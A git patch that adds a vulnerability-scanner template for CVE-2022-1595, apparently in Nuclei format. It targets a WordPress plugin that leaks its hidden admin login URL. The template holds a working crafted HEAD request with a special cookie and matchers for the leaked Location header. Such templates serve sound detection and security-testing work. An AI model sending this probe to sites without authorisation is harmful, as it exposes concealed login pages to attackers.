From 2dcd340a509f196318fa761809d555b8eb797a27 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 13 Dec 2022 17:09:39 +0530 Subject: [PATCH] Added template for CVE-2022-1595 --- cves/2022/CVE-2022-1595.yaml | 38 ++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2022/CVE-2022-1595.yaml diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml new file mode 100644 index 0000000000..896412bb68 --- /dev/null +++ b/cves/2022/CVE-2022-1595.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-1595 + +info: + name: HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure + author: theamanrawat + severity: medium + description: | + The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request. + reference: + - https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b + - https://wordpress.org/plugins/hc-custom-wp-admin-url/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1595 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.1 + cve-id: CVE-2022-1595 + cwe-id: CWE-200 + metadata: + verified: "true" + tags: cve,cve2022,wpscan,info-disclosure,wordpress,wp-plugin,hc-custom-wp-admin-url,unauth + +requests: + - raw: + - | + HEAD /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Cookie: valid_login_slug=1 + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Location: ([a-zA-Z0-9_.\\/-]+)" + + - type: status + status: + - 302 \ No newline at end of file